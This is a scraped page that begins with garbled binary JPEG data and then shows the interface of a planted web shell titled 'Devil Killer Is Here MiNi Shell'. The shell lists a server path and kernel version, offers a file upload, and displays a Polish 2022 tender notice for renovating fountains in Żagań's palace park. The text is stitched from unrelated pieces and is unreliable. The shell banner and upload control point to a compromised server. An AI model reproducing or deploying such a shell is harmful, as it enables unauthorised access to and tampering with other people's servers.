JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221117/0044343801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja fontann znajdujących się na terenie parku pałacowego w Żaganiu- Etap IV: remont fontanny z Wazą, fontanny z Nereidami i uskrzydlonym Amorem oraz fontann Kamienistej i Kaskady przy fosie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŻAGAŃ O STATUSIE MIEJSKIM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770824</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Słowiański 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żagań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 684771040</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@um.zagan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://urzadmiasta.zagan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja fontann znajdujących się na terenie parku pałacowego w Żaganiu- Etap IV: remont fontanny z Wazą, fontanny z Nereidami i uskrzydlonym Amorem oraz fontann Kamienistej i Kaskady przy fosie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-83fd3808-65a6-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00443438</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031292/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Modernizzacja fontann znajdujacych się na terenie parku pałacowego w Żaganiu - etap IV- remont fontanny z Wazą , fonatnny z Nereidami i uskrzydlonym Amorem oraz fontann Kamienistej i Kaskady przy ...</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejski Fundusz Rozwoju Regionalnego w ramach Osi Priorytetowej 2-5 i 9 Regionalnego Programu Operacyjnego – Lubuskie 2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10.1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/. <br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi zalogować się na miniPortalu- dla wykonawcy i odszukać postępowanie o realizację którego chce się ubiegać. <br/>Ponadto Wykonawca musi posiadać konto ze skrzynką na ePUAP https://epuap.gov.pl/wps/portal Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. <br/><br/>10.2. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w regulaminie korzystania z miniPortalu, z którym należy się zapoznać https://miniportal.uzp.gov.pl <br/><br/>Uwaga ! Miniportal nie zawiera instrukcji odnośnie sporządzenia dokumentów w formie elektronicznej oraz składania podpisu w formie elektronicznej. Kwestie te reguluje Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie( Dz.U z 2020 r. poz. 2452 ), z którym Wykonawca powinien zapoznać się we własnym zakresie .<br/><br/>10.3. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu określone w regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/><br/>10.4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.Podpisanie dedykowanego formularza do złożenia i wycofania oferty oraz do komunikacji nie oznacza podpisania druku formularza oferty, oświadczenia, wykazów czy innych załączonych do oferty dokumentów, one muszą zostać popisane elektronicznie odrębnie po ich sporządzeniu przed zaszyfrowaniem oferty i przed załączeniem ich do dedykowanego formularza do złożenia oferty.<br/><br/>10.5. Za datę przekazania oferty, oświadczenia- o którym mowa w art.125ust.1 Pzp, podmiotowych środków dowodowych, oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP, na właściwy adres i skrzynkę <br/>NAZWA SKRZYNKI ePUAP : URZĄD MIASTA ŻAGAŃ <br/>ADRES SKRZYNKI ePUAP : /6581xuoheg/SkrytkaESP<br/><br/>10.6. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się również elektronicznie, za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem Identyfikatora postępowania z miniportalu oraz numerem ogłoszenia (BZP);<br/><br/>10.7. Zamawiający dopuszcza również możliwość komunikowania się za pomocą poczty elektronicznej, email: info@um.zagan.pl; z wyłączeniem możliwości składania ofert, które zawsze muszą odbywać się poprzez ePUAP i miniPortal. <br/><br/>10.8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO <br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Żagań przy Plac Słowiański 17, 68-100 Żagań;<br/>	z inspektorem ochrony danych osobowych można się skontaktować:<br/> iod@um.zagan.pl *;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego.<br/> prowadzonym w trybie podstawowym, poniżej progów unijnych;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art.74 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych ( Dz. U. z 2021 r. poz.1129 ze zmianami ), zwana dalej „ustawą Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>________________<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub <br/> podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.721.25.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> . Opis przedmiotu zamówienia: Teren, na którym planowana jest inwestycja, zlokalizowany jest w Żaganiu przy ul. Szprotawskiej, obejmuje działkę o nr ew. 799, która stanowi park przypałacowy. Obecnie teren parku jest strefą wypoczynkowo-rekreacyjną dla mieszkańców miasta. Nieruchomość objęta jest ochroną konserwatorską poprzez wpis do rejestru zabytków. Obecny stan techniczny fontann jest zły pod względem architektoniczno-wizualnym jak i funkcjonalno-użytkowym. Fontanny są nieczynne. Część fontann jest w postaci cząstkowej i wymagają odtworzenia. W nawiązaniu do realizowanych obecnie prac rewitalizacyjnych kompleksu parkowo-pałacowego remonty fontann będą uzupełnieniem poprawiającym funkcjonalność i wizerunek architektoniczny parku pałacowego w Żaganiu. Odtworzenie i modernizacja fontann i urządzeń wodnych pomoże przywrócić część dawnej świetności tego miejsca i podniesie jego walory estetyczne.<br/><br/>3.2. Zakres przewidywanych robót obejmuje realizację następujących robót : <br/>-remont „Fontanny Kamienistej” przed pałacem, <br/>- remont „Kaskady wodnej „ na zboczu fosy, <br/>- remont z rekonstrukcją „Fontanny z wazą”, <br/>- remont z rekonstrukcją „Fontanny z Nereidami i uskrzydlonym Amorem”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45453100-8 - Roboty renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	najniższa cena - 60 %,= 60 pkt <br/>b)	okres gwarancji - 40 %= 40 pkt <br/><br/>a1 ) Oferta z najniższą ceną otrzyma – 60 pkt, każda następna oferta oceniana będzie na podstawie wzoru: <br/> cena najniższa spośród złożonych ofert <br/>Wartość pkt oferty n = --------------------------------------- x 60 % x 100 <br/> cena oferty badanej n<br/>Wyliczona punktacja za cenę zostanie zaokrąglona do dwóch miejsc po przecinku ; <br/><br/>b1) Oferta z najdłuższym okresem gwarancji jakości otrzyma 40 pkt, każda następna oferta oceniania będzie na podstawie wzoru : <br/> okres gwarancji badanej oferty <br/>Wartość pkt oferty n = --------------------------------------- x 40 % x 100 <br/> najdłuższy okres gwarancji<br/>Minimalny okres gwarancji wynosi 36 miesięcy (należy podać w miesiącach). Maksymalny okres gwarancji wynosi 60 miesięcy.<br/>W przypadku zaoferowania okresu gwarancji krótszego jak 36 miesięcy lub nie podania żadnego okresu gwarancji – oferta zostanie odrzucona, jako niezgodna z treścią SWZ. <br/>W przypadku gdy Wykonawca zaoferuje okres gwarancji dłuższy jak 60 miesięcy, oferta otrzyma maksymalną liczbę punktów, jak za 60 miesiące gwarancji, a do umowy zostanie przyjęta wartość podana w ofercie, w przypadku wyboru oferty.<br/><br/>16.2. Maksymalna ilość punktów, jaką po uwzględnieniu wszystkich kryteriów może osiągnąć oferta to 100 punktów( 60 punktów za Cenę + 40 punktów za kryterium Okres Gwarancji).<br/><br/>16.3. Zamawiający za najkorzystniejszą ofertę uzna ofertę z największą ilością uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: nie podlegają wykluczeniu w okolicznościach, o których mowa w art. 108 ust.1 Pzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz spełniają warunki udziału w postępowaniu w zakresie: <br/> 1) Sytuacji ekonomicznej lub finansowej: Wykonawca spełni ten warunek jeżeli wykaże, <br/> że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej <br/> działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą <br/> jak 100 000,00 zł; <br/> 2) Zdolności technicznej lub zawodowej – Wykonawca spełni ten warunek jeżeli : <br/> - wykaże się, że nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia <br/> działalności jest krótszy- w tym okresie, przed upływem terminu składania ofert, <br/> wykonał co najmniej jedno zadanie odpowiadające swym zakresem i wartością <br/> robotom stanowiącym przedmiot zamówienia, przez co należy rozumie: remont <br/> fontann objętych ochroną konserwatorską (wpis do rejestru zabytków) lub ujęcie w <br/> wojewódzkiej lub gminnej ewidencji zabytków, o wartości nie mniejszej niż <br/> 100 000,00 zł. .brutto;<br/> - wykaże się dysponowaniem osobami zdolnymi do wykonywania zamówienia, a <br/> mianowicie: <br/> - jedną osobą do realizacji zamówienia pełniącą obowiązki Kierownika budowy, która <br/> posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności <br/> konstrukcyjno-budowlanej lub innymi odpowiadającymi im uprawieniami <br/> budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów prawa, <br/> która posiada doświadczenie zawodowe w remoncie analogicznych obiektów, <br/> przez co należy rozumień remont fontann objętych ochroną konserwatorską, <br/> posiada uprawnienia wymagane w art. 37 c ustawy z dnia 23.07.2003 r. o ochronie <br/> zabytków i opiece nad zabytkami (Dz.U z 2022 r, poz. 840 t.j. ze zmianami ) tj. <br/> posiada uprawnienia do kierowania budową przy zabytkach nieruchomych <br/> wpisanych do rejestru zabytków lub osobą , która wykaże, że przez co najmniej 18<br/> miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach <br/> nieruchomych (robotami budowlanymi przy zabytkach nieruchomych wpisanych do <br/> rejestru może kierować osoba, która poosiada uprawnienia budowlane określone <br/> przepisami prawa budowlanego oraz która przez co najmniej 18 miesięcy brała udział <br/> w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do <br/> rejestru lub inwentarza muzeum będącego instytucją kultury). <br/> Uwaga ! Udział w robotach budowlanych prowadzonych przy zabytkach wpisanych <br/> do rejestru, inwentarza muzeum będącego instytucją kultury lub innych zabytkach <br/> zaliczanych do jednej z kategorii potwierdzają świadectwa, w tym dotyczące odbytych <br/> praktyk zawodowych, oraz inne dokumenty zaświadczające udział w tych pracach, <br/> badaniach lub robotach lub zatrudnienie przy pracach, wydane przez kierownika <br/> jednostki organizacyjnej, na rzecz której te prace, badania lub roboty były <br/> wykonywane, albo przez osobę, pod której nadzorem były wykonywane, w tym <br/> zakresy obowiązków na stanowiskach pracy w muzeum będącym instytucją kultury <br/> lub zaświadczenia wydane przez wojewódzkich konserwatorów zabytków. <br/> Udział w robotach budowlanych prowadzonych przed 26 sierpnia 2011 r przy zabytku <br/> niewpisanym do rejestru zabytków potwierdzają świadectwa, inne dokumenty lub <br/> zaświadczenia, o których mowa wyżej ;<br/> - jedną osobą do realizacji zamówienia, która będzie prowadziła prace konserwatorskie <br/> i restauratorskie oraz badania konserwatorskie, która jest zobowiązana posiadać <br/> stosowne uprawnienia. Pracami konserwatorskimi, pracami restauratorskimi lub <br/> badaniami konserwatorskimi prowadzonymi przy zabytkach wpisanych do rejestru <br/> kieruje osoba która ukończyła studnia drugiego stopnia lub jednolite studia<br/> magisterskie, w zakresie konserwacji i restauracji dzieł sztuki lub konserwacji <br/> zabytków oraz która po rozpoczęciu studiów drugiego stopnia lub po zaliczeniu <br/> szóstego semestru 